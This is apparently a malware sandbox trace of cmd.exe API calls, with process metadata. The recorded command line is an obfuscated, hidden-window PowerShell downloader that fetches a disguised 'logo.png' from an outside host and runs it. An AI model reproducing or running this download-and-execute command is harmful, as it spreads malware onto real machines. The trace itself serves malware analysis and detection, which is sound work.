	[0121.160] _get_osfhandle (_FileHandle=0) returned 0x3
	[0121.160] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0121.160] GetEnvironmentStringsW () returned 0x4e8f20*
	[0121.160] GetProcessHeap () returned 0x4d0000
	[0121.160] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xad4) returned 0x4e9a00
	[0121.160] FreeEnvironmentStringsW (penv=0x4e8f20) returned 1
	[0121.160] GetProcessHeap () returned 0x4d0000
	[0121.160] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x8) returned 0x4e87a0
	[0121.160] GetEnvironmentStringsW () returned 0x4e8f20*
	[0121.160] GetProcessHeap () returned 0x4d0000
	[0121.160] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xad4) returned 0x4ea4e0
	[0121.160] FreeEnvironmentStringsW (penv=0x4e8f20) returned 1
	[0121.160] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2feb98 | out: phkResult=0x2feb98*=0x44) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x0, lpData=0x2febb0*=0x18, lpcbData=0x2feb94*=0x1000) returned 0x2
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x1, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x0, lpData=0x2febb0*=0x1, lpcbData=0x2feb94*=0x1000) returned 0x2
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x0, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x40, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x40, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x0, lpData=0x2febb0*=0x40, lpcbData=0x2feb94*=0x1000) returned 0x2
	[0121.161] RegCloseKey (hKey=0x44) returned 0x0
	[0121.161] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2feb98 | out: phkResult=0x2feb98*=0x44) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x0, lpData=0x2febb0*=0x40, lpcbData=0x2feb94*=0x1000) returned 0x2
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x1, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x0, lpData=0x2febb0*=0x1, lpcbData=0x2feb94*=0x1000) returned 0x2
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x0, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x9, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x4, lpData=0x2febb0*=0x9, lpcbData=0x2feb94*=0x4) returned 0x0
	[0121.161] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2feb90, lpData=0x2febb0, lpcbData=0x2feb94*=0x1000 | out: lpType=0x2feb90*=0x0, lpData=0x2febb0*=0x9, lpcbData=0x2feb94*=0x1000) returned 0x2
	[0121.161] RegCloseKey (hKey=0x44) returned 0x0
	[0121.161] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e87
	[0121.161] srand (_Seed=0x5d3b2e87) 
	[0121.161] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0121.161] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0121.162] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.162] GetProcessHeap () returned 0x4d0000
	[0121.162] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x218) returned 0x4e8f20
	[0121.162] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e8f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0121.162] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0121.162] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0121.162] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0121.162] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0121.162] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0121.162] GetProcessHeap () returned 0x4d0000
	[0121.162] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e9a00 | out: hHeap=0x4d0000) returned 1
	[0121.162] GetEnvironmentStringsW () returned 0x4e9140*
	[0121.162] GetProcessHeap () returned 0x4d0000
	[0121.162] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xaec) returned 0x4ebad0
	[0121.163] FreeEnvironmentStringsW (penv=0x4e9140) returned 1
	[0121.163] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0121.163] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0121.163] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0121.163] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0121.163] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0121.163] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0121.163] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0121.163] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0121.163] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0121.163] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0121.163] GetProcessHeap () returned 0x4d0000
	[0121.163] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x48) returned 0x4e8d80
	[0121.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ff9a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.163] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x2ff9a0, lpFilePart=0x2ff980 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x2ff980*="Documents") returned 0x1b
	[0121.163] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0121.163] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ff6b0 | out: lpFindFileData=0x2ff6b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x4ec5d0
	[0121.163] FindClose (in: hFindFile=0x4ec5d0 | out: hFindFile=0x4ec5d0) returned 1
	[0121.163] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x2ff6b0 | out: lpFindFileData=0x2ff6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x4ec5d0
	[0121.163] FindClose (in: hFindFile=0x4ec5d0 | out: hFindFile=0x4ec5d0) returned 1
	[0121.163] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x2ff6b0 | out: lpFindFileData=0x2ff6b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x4ec5d0
	[0121.164] FindClose (in: hFindFile=0x4ec5d0 | out: hFindFile=0x4ec5d0) returned 1
	[0121.164] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0121.164] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0121.164] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0121.164] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0121.164] GetProcessHeap () returned 0x4d0000
	[0121.164] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ebad0 | out: hHeap=0x4d0000) returned 1
	[0121.164] GetEnvironmentStringsW () returned 0x4eafd0*
	[0121.164] GetProcessHeap () returned 0x4d0000
	[0121.164] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb2c) returned 0x4ebb10
	[0121.164] FreeEnvironmentStringsW (penv=0x4eafd0) returned 1
	[0121.164] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.164] GetProcessHeap () returned 0x4d0000
	[0121.164] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e8d80 | out: hHeap=0x4d0000) returned 1
	[0121.164] GetProcessHeap () returned 0x4d0000
	[0121.164] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4016) returned 0x4ec650
	[0121.164] GetProcessHeap () returned 0x4d0000
	[0121.164] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x260) returned 0x4e9c80
	[0121.165] GetProcessHeap () returned 0x4d0000
	[0121.165] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ec650 | out: hHeap=0x4d0000) returned 1
	[0121.165] GetConsoleOutputCP () returned 0x1b5
	[0121.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0121.165] GetUserDefaultLCID () returned 0x409
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ffab0, cchData=128 | out: lpLCData="0") returned 2
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ffab0, cchData=128 | out: lpLCData="0") returned 2
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ffab0, cchData=128 | out: lpLCData="1") returned 2
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0121.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0121.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0121.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0121.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0121.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0121.166] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0121.166] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0121.166] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0121.166] GetProcessHeap () returned 0x4d0000
	[0121.166] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20c) returned 0x4e9f60
	[0121.166] GetConsoleTitleW (in: lpConsoleTitle=0x4e9f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0121.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0121.166] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0121.167] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0121.167] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0121.167] GetProcessHeap () returned 0x4d0000
	[0121.167] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4012) returned 0x4ec650
	[0121.167] GetProcessHeap () returned 0x4d0000
	[0121.167] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4010) returned 0x4f0670
	[0121.167] GetProcessHeap () returned 0x4d0000
	[0121.167] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a) returned 0x4e49a0
	[0121.167] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0121.167] GetProcessHeap () returned 0x4d0000
	[0121.167] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e49a0 | out: hHeap=0x4d0000) returned 1
	[0121.167] GetProcessHeap () returned 0x4d0000
	[0121.167] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4f0670 | out: hHeap=0x4d0000) returned 1
	[0121.167] GetProcessHeap () returned 0x4d0000
	[0121.167] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4010) returned 0x4f0670
	[0121.167] GetProcessHeap () returned 0x4d0000
	[0121.167] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a) returned 0x4e49a0
	[0121.167] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0121.168] GetProcessHeap () returned 0x4d0000
	[0121.168] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e49a0 | out: hHeap=0x4d0000) returned 1
	[0121.168] GetProcessHeap () returned 0x4d0000
	[0121.168] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4f0670 | out: hHeap=0x4d0000) returned 1
	[0121.168] GetProcessHeap () returned 0x4d0000
	[0121.168] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ec650 | out: hHeap=0x4d0000) returned 1
	[0121.168] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0121.168] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0121.169] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0121.169] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0121.169] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0121.169] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0121.169] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0121.169] GetProcessHeap () returned 0x4d0000
	[0121.169] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb0) returned 0x4ea180
	[0121.169] GetProcessHeap () returned 0x4d0000
	[0121.169] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x30) returned 0x4e69a0
	[0121.169] GetProcessHeap () returned 0x4d0000
	[0121.169] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x14) returned 0x4e8d80
	[0121.169] GetProcessHeap () returned 0x4d0000
	[0121.169] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb0) returned 0x4ea240
	[0121.170] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0121.170] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0121.170] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0121.170] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0121.170] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0121.170] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0121.170] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0121.170] GetProcessHeap () returned 0x4d0000
	[0121.170] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb0) returned 0x4ea300
	[0121.170] GetProcessHeap () returned 0x4d0000
	[0121.170] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4e69e0
	[0121.478] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0121.478] GetProcessHeap () returned 0x4d0000
	[0121.478] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x170) returned 0x4d1a20
	[0121.478] GetProcessHeap () returned 0x4d0000
	[0121.478] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2d0) returned 0x4eb050
	[0121.488] _get_osfhandle (_FileHandle=2) returned 0xb
	[0121.488] GetFileType (hFile=0xb) returned 0x2
	[0121.488] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0121.488] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ff358 | out: lpMode=0x2ff358) returned 1
	[0121.488] _get_osfhandle (_FileHandle=2) returned 0xb
	[0121.488] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ff390 | out: lpConsoleScreenBufferInfo=0x2ff390) returned 1
	[0121.488] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0121.490] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0121.490] GetProcessHeap () returned 0x4d0000
	[0121.490] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x170) returned 0x4d1c30
	[0121.490] GetProcessHeap () returned 0x4d0000
	[0121.490] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2d0) returned 0x4eb6b0
	[0121.492] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x2ff180*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ff130 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x2ff130*(hProcess=0x54, hThread=0x50, dwProcessId=0xc64, dwThreadId=0xc68)) returned 1
	[0121.497] CloseHandle (hObject=0x50) returned 1
	[0121.497] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0121.497] GetProcessHeap () returned 0x4d0000
	[0121.497] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ebb10 | out: hHeap=0x4d0000) returned 1
	[0121.497] GetEnvironmentStringsW () returned 0x4eb8d0*
	[0121.497] GetProcessHeap () returned 0x4d0000
	[0121.497] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb2c) returned 0x4ec820
	[0121.497] FreeEnvironmentStringsW (penv=0x4eb8d0) returned 1
	[0121.497] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "39"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7b7ad000"
	os_pid = "0xc04"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "33"
	os_parent_pid = "0xb6c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 313
	os_tid = 0xc08

	[0121.097] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc90 | out: lpSystemTimeAsFileTime=0x2cfc90*(dwLowDateTime=0xc060c190, dwHighDateTime=0x1d543d1)) 
	[0121.097] GetCurrentProcessId () returned 0xc04
	[0121.097] GetCurrentThreadId () returned 0xc08
	[0121.097] GetTickCount () returned 0x2e9f0
	[0121.097] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc98 | out: lpPerformanceCount=0x2cfc98*=24552336016) returned 1
	[0121.099] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0121.099] __set_app_type (_Type=0x1) 
	[0121.099] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0121.099] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0121.100] GetCurrentThreadId () returned 0xc08
	[0121.100] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc08) returned 0x3c
	[0121.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
